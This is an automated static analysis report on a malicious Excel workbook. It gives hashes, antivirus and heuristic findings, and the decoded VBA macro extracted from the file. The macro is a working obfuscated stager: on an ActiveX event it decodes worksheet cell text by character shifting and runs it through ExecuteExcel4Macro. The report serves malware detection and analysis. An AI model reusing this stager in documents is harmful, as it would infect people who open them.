Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 aed09d91cb9d4f68…

MALICIOUS

Office (OOXML)

29.6 KB Created: 2020-09-22 07:36:46 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-10-01
MD5: c7231688aa59fe4f96182e9998736b9a SHA-1: 214fdb2bbe8cf28760b0322afca19b9ae3151d20 SHA-256: aed09d91cb9d4f68e7941bc3005fa0f01cfdc9d73b05b6676c04033123a2054c
240 Risk Score

Heuristics 4

  • ClamAV: Xls.Malware.Mrhl-9774585-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Mrhl-9774585-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA ActiveX event runs worksheet-decoded XLM formulas critical OLE_VBA_ACTIVEX_XLM_CELL_STAGER
    VBA code attached to an ActiveX/UserForm event reconstructs formula text from worksheet constants using Split/Replace/Mid or character shifting, then executes it through ExecuteExcel4Macro or Run. This is a high-confidence malware stager that hides XLM formula execution in sheet cells; it is not a document-parser CVE.
    Matched line in script
    r = 65: ExecuteExcel4Macro (chatss)
  • OOXML VBA project hides Excel 4 macro execution bridge high OOXML_VBA_XLM_BRIDGE_RAW
    Raw vbaProject.bin metadata references ExecuteExcel4Macro together with string-deobfuscation primitives, and the OOXML package exposes a button, drawing, or control surface that can invoke VBA. This is a macro/XLM stager indicator for projects whose source cannot be recovered cleanly; it is not a document-parser CVE attribution.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1368 bytes
SHA-256: 165c43708aa80c9c9112c0fd156565042506fba3024ce0bccffeb0adcf230f53
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "guidamsd, 1, 0, MSForms, MultiPage"
Sub Guida1()
Application.WindowState = xlMinimized: ft = 1
A = tops: r = "j"
For Each uno In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): uno1 = uno1 & uno: Next
For g = A To Len(uno1) Step A
If (g Mod 2) Then wr = -1 Else wr = ft
ii = ii & Chr(Asc(Mid(uno1, g, ft)) + wr): Next
mb = Split(ii, r)
For Each y In mb
ry = A: picolas (Replace(y, "[", "J"))
Next
ems
End Sub
Function picolas(ByVal chatss As String) As String
r = 65: ExecuteExcel4Macro (chatss)
End Function
Private Sub guidamsd_Layout(ByVal Index As Long)
Guida1
End Sub
Function ems()
ems = tops - tops
ActiveWorkbook.Close ems
End Function
Function tops()
tops = 3
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 16896 bytes
SHA-256: 62d9eccb10905179c9603e4a40aac05e5b84661c0a00dac16f06a4507adc13b7
Detection
ClamAV: Xls.Malware.Mrhl-9774585-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 1408 bytes
SHA-256: 50abcb00719c61b78c5bbdc4312ee8a19e77b56a68945f68db89c6160e20eb9c

Open this report in the interactive analyzer, or submit your own file for analysis.